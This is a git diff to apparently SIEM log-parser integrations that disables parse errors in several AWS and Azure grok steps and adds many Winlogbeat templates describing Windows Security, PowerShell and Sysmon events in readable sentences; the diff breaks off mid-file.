diff --git a/AWS/aws-cloudtrail/ingest/parser.yml b/AWS/aws-cloudtrail/ingest/parser.yml index 265f9f7b7..31dcee72d 100644 --- a/AWS/aws-cloudtrail/ingest/parser.yml +++ b/AWS/aws-cloudtrail/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sourceIPAddress output_field: source pattern: "(%{IP:ip}|%{HOSTNAME:domain})" diff --git a/AWS/aws-guardduty/ingest/parser.yml b/AWS/aws-guardduty/ingest/parser.yml index 06512d7b1..7cb4ac969 100644 --- a/AWS/aws-guardduty/ingest/parser.yml +++ b/AWS/aws-guardduty/ingest/parser.yml @@ -13,6 +13,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.type output_field: finding pattern: "%{DATA:threat_purpose}:%{DATA:affected_resource_type}/%{WORD:threat_family_name}(.%{DATA:detection_mecanism})?(!%{DATA:artifact})?" diff --git a/Azure/azure-network-watcher/ingest/parser.yml b/Azure/azure-network-watcher/ingest/parser.yml index edca894ef..f6af50849 100644 --- a/Azure/azure-network-watcher/ingest/parser.yml +++ b/Azure/azure-network-watcher/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.get('flow.0')}}" output_field: result pattern: "%{NUMBER:timestamp},%{IP:source_ip},%{IP:destination_ip},%{NUMBER:source_port},%{NUMBER:destination_port},%{PROTOCOL:protocol},%{TRAFFICFLOW:traffic_flow},%{TRAFFICDECISION:traffic_decision}(|,(%{FLOWSTATE:flow_state}|),(%{INT:source_packets}|),(%{INT:source_bytes}|),(%{INT:destination_packets}|),(%{INT:destination_bytes}|))" diff --git a/Azure/azure-windows/ingest/parser.yml b/Azure/azure-windows/ingest/parser.yml index 4a4e76ac7..bfd2e9740 100644 --- a/Azure/azure-windows/ingest/parser.yml +++ b/Azure/azure-windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_windows_event.message.EventData.SubjectUserName or parse_windows_event.message.EventData.User}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -36,6 +37,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parse_windows_event.message.EventData.Hashes | lower}}" output_field: result value_sep: "=" diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index eb6a595a2..1d8547db9 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1,34 +1,1631 @@ [ { - "value": "Auditing event on {winlog.computer_name}: {event.action}", + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": "executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4798 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4103 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 4106 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" }, { - "field": "winlog.computer_name" + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" }, { - "field": "event.action" + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" } ] }, { - "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 1 }, { - "field": "winlog.computer_name" + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" }, { - "field": "winlog.SubjectUserSid" + "field": "process.executable" }, { - "field": "event.action" + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} changed the creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { 